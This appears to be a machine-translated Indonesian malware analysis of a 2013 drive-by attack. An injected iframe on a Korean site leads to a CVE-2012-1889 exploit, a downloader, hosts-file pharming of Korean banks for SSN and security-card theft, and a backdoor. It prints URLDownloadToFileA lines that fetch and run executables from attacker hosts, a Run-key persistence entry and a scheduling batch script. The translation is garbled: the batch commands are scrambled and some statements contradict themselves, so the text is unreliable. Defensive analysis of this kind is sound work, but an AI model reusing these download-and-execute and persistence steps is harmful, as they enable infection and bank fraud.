Situs, spc.or.kr, adalah situs yang sah Korea yang dimiliki Properti Korea Software Kanan Council (SPC). Setelah membuka situs dan menunjukkan kode sumbernya, kita melihat ke script disertakan / js/common1.js. Script ini meliputi dua javascripts (yang ketiga adalah komentar). Ketika kita membuka kedua script, kami melihat tag iframe mencurigakan pada akhir / js/screen1.js. Ini tag iframe membawa kita ke rootadmina2012.com, yang merupakan situs serangan utama.
Situs web asli, rootadmin2012.com, berisi tiga baris kode berikut:
Dua yang pertama item iframe yang berisi heapspray dan shellcodes, dan tag script terakhir adalah counter, yang memberitahu cybercriminals berapa kali halaman serangan utama dieksekusi.
Setelah pemeriksaan singkat 1.html, kita dapat melihat variabel dengan "shellcode" nama yang menarik
yang, setelah unquoting, memberi kita shellcode berikut:
Anda dapat melihat string teks terlihat di dalam - urlmon, yang merupakan perpustakaan jendela untuk komunikasi internet, C: \ x.exe, yang merupakan nama file, di mana isinya download disimpan dan kemudian dieksekusi, dan http://rootadmin2012. com / sun.exe, yang berisi tahap lain dari serangan.
Setelah mengamati cc.html, kita dapat melihat string lain yang menarik:
Ini memberi kita firasat bahwa eksploitasi ini ada hubungannya dengan Internet Explorer (yaitu), dan tumpukan penyemprotan (heaplib). Setelah mencari lebih lanjut, kami mampu menentukan bahwa serangan ini menggunakan CVE-2012-1889 (http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1889) kerentanan, yang memungkinkan penyerang remote melalui situs web dibuat untuk mengeksekusi kode sewenang-wenang. Cari classid = f6D90f11-9c73-11d3-b32e-00C04f990bb4 di kedua cc.html dan link berikut di http://www.exploit-db.com/exploits/19186/ memanfaatkan database.
Penting untuk dicatat bahwa serangan ini bekerja hanya pada komputer dengan DEP cacat (data pencegahan eksekusi). Jika Anda menjalankan serangan terhadap komputer dengan DEP diaktifkan, pesan berikut akan ditampilkan
Sun.exe File adalah tahap kedua downloader, 15KB ukuran, ditulis dalam Visual Basic. Ini memiliki ikon yang sama sebagai dokumen Microsoft Word.
Ketika akan didownload, ia melakukan tugas-tugas berikut:
1) Cek koneksi internet dengan men-download gambar dari naver.net, yang merupakan mesin pencari Korea
URLDownloadToFileA ("http://static.naver.net/w9/blank.gif", "c: \ ntldrs \ Isinter.gif")
Jika (sizeOfFile ("c: \ ntldrs \ Isinter.gif")> 0) Lalu
Hapus "ntldrs :/ c / Isinter.gif"
2) Downloads
URLDownloadToFileA ("http://myadmin2012.com/sun.txt", "c: \ ntldrs \ system.yf")
yang kemudian ditambahkan ke file host C: \ WINDOWS \ system32 \ drivers \ etc \ host. Anytime pengguna mengakses salah satu situs yang disebutkan di atas milik bank Korea, dia / dia akan diarahkan ke 126.114.224.53 (softbank126114224053.bbtec.net), yang merupakan server yang terletak di Jepang.
3) Membuka situs berikut di http://myadmin2012.com/tong.htm "
"C: \ Program Files \ Internet Explorer \ IEXPLORE.EXE".
yang merupakan script untuk lain counter, yang memberitahu penyerang, berapa kali downloader didownload.
4) Untuk membuat dirinya terus-menerus (dalam kasus reboot komputer, dll ...)
memodifikasi Software \ Microsoft \ Windows \ CurrentVersion \ Run kunci registri dengan menambahkan nilai dengan nama "skunser" dan data "C: \ ntldrs \ svchest.exe", di mana ia sebelumnya disalin sendiri.
5) Ini download file backdoor,
-------------------------URLDownloadToFileA ("http://www.hisunpharm.com/files/File/product/pao.exe", "C: \ Program Files \ tongji2.exe")-------------------------
menyimpannya ke dalam tongji2.exe, dan mengeksekusinya. Tongji2 adalah file backdoor yang mencoba untuk menghubungkan ke website lain dikendalikan oleh penjahat cyber.
6) Ini tetes dan mengeksekusi file batch berikut, yang jadwal awal downloader masing-masing 30 menit. "Pada XX: XX / interaktif" memastikan, bahwa svchest.exe dimulai dengan hak sistem lokal (on WinXP), yang lebih tinggi dari hak Administrator.
-------------------------@ Echo offschtasks / menghapus / tn * / fsc config Jadwal start = automulai bersih "Task Scheduler"Di 0:00 / interaktif c :/ ntldrs / svchest.exePada 00:30 / interaktif :/ ntldrs c / svchest.exeAt 1:00 / interaktif c :/ ntldrs / svchest.exeAt 1:30 / interaktif :/ ntldrs c / svchest.exe...Pada 24:30 / interaktif :/ ntldrs c / svchest.exedel% 0-------------------------
Tahap ketiga serangan adalah modul tongji2.exe utama.
Modul ini merupakan dieksekusi dengan ukuran sekitar 1.3M, ditulis dalam Delphi, dikemas dengan Safengine. Dari analisis dinamis, kita dapat mengamati, bahwa setelah eksekusi itu menyuntikkan dirinya ke iexplore.exe menjadi kurang mencurigakan untuk pengguna komputer yang tidak terlatih. Ini kemudian mencoba untuk memulai koneksi melalui protokol komunikasi kustom. Pesan yang diterima akan didekripsi oleh loop xor sederhana. Kemudian, tergantung pada isi pesan yang diterima, ia memilih untuk menjalankan salah satu dari banyak fungsi built-in, misalnya, men-download file, reboot komputer, membaca clipboard, membaca registry, membaca informasi sistem dan banyak lainnya. Kita dapat mengklasifikasikan ini sebagai trojan backdoor dan infostrealer, yang memungkinkan penyerang untuk mengendalikan komputer dikompromikan. Hal ini juga mencoba untuk terhubung ke laoding521.eicp.net, pelabuhan 889. eicp.net, webhosting Cina bebas, yang termasuk oray.com.
Mari kita lihat konsekuensi dari file host yang dimodifikasi. Dalam screenshot diatas, kami menunjukkan bahwa file host yang dimodifikasi sedemikian rupa sehingga alamat IP diikuti dengan alamat URL dari sebuah bank Korea. Skenario yang sama terjadi lebih dari sekali - bagi bank Korea beberapa. Kami akan menunjukkan contoh Koonmin Bank (KBStar). Dalam gambar di bawah, Anda dapat melihat halaman web KBStar aslinya. Perhatikan oval merah di pojok kiri atas. Ini menunjukkan https, http-aman, komunikasi terenkripsi dan oleh karena itu semua data yang dimasukkan dan dikirim oleh pelanggan bank dienkripsi sebelum dikirim.
Ketika kita membuka halaman web yang sama pada komputer yang terinfeksi (dengan file host yang dimodifikasi), ia akan menampilkan halaman yang sama persis (visual), tetapi kode sumber halaman web utama adalah sekarang berbeda. Pengguna tidak berkomunikasi dengan situs web bank, namun dengan server penyerang. Lihat gambar di bawah. Kita dapat melihat bahwa string "onclick = otperror (") "sering diulang dalam situs palsu (kiri), link normal ditampilkan dalam situs asli (kanan).
Setelah pengguna mengklik pada link pada halaman web palsu, dia / dia menunjukkan pesan kesalahan berikut mengatakan bahwa komputer telah terinfeksi oleh virus dan, untuk alasan keamanan, ia / dia perlu untuk mengisi aplikasi untuk layanan pencegahan penipuan.
Setelah mengklik tombol OK, pengguna diarahkan ke halaman, di mana ia / dia meminta nama dan nomor jaminan sosial (SSN). Ketika format SSN yang dimasukkan benar, maka pengalihan pengguna untuk bentuk lanjut meminta rincian pelanggan lebih, termasuk alamat, nomor telepon, kartu keamanan, dan rincian lebih banyak.
19-afterOKNote pojok kiri atas. Formulir ini tidak dienkripsi, sehingga semua informasi pribadi pelanggan sedang dikirim ke penyerang dalam bentuk terenkripsi. Cybercriminals kemudian memiliki semua mandat korban dan dapat menjarah uang dari rekening korban.
Banyak website Korea memerlukan nama dan SSN untuk pendaftaran. Ada kebocoran SSN banyak, sehingga beberapa website mulai pindah ke Ipin (Internet Personal Identification Number), yang merupakan pengganti yang aman untuk nama dan SSN. Namun, Ipin masih belum begitu populer sehingga nama dan SSN adalah informasi masih berharga. Situasi yang sama terjadi dengan Kartu Security, yang juga merupakan bagian penting dari internet banking Korea. Tanpa kartu ini, pelanggan tidak dapat mengeluarkan sertifikat untuk internet banking. Beberapa tahun yang lalu, bank-bank Korea banyak yang mulai pindah ke OTP (One Time Password) dongle. Namun, banyak orang masih menggunakan kartu keamanan, itulah sebabnya mengapa cybercriminals ingin mencuri mereka juga. Internet banking Korea mungkin akan lebih aman jika semua pelanggan digunakan sebelumnya disebutkan metode yang lebih aman dari otentikasi. Sayangnya, masih banyak orang yang menggunakan cara-cara lama dan kurang aman mengakses accounts.Cybercriminals mereka tahu itu dan mengambil keuntungan dari itu.
Info tentang domain:
Domain Name: ROOTADMIN2012.COMPenciptaan Tanggal: 23-jan-2013Expiration Date: 23-jan-2014
Domain Name: MYADMIN2012.COMPenciptaan Tanggal: 23-jan-2013Expiration Date: 23-jan-2014
Kedua domain host dalam alamat IP berikut di Jepang:61.196.247.51 (061196247051.cidr.odn.ne.jp)
Kesimpulan:
Serangan itu mungkin berasal dari Cina. Selain dari lokasi final (laoding521.eicp.net), yang di Cina, analisis dari kedua eksekusi tahap 2 dan 3 membuat kita berpikir begitu. Pertama-tama, nama file seperti Tongji (statistik), tong (connect), pao (run) pasti Cina.
Setelah decompiling panggung downloader kedua, kita dapat menemukan kata lain CinaPrivate Sub duquwenjian_Timer (Wenjian = dokumen, file)Atribut VB_Name = "hei" (hei = hack)Public Sub chuangjian (chuangjian = menemukan, membangun)Public Sub wanbi (wanbi = selesai, akhir, lengkap)dll ...
Tahap 3 dilindungi dengan Safengine, pelindung executable Cina, yang biasanya tidak terlihat dengan malware yang berasal dari negara lain.
Berkat Bin Jong Chae bantuan.
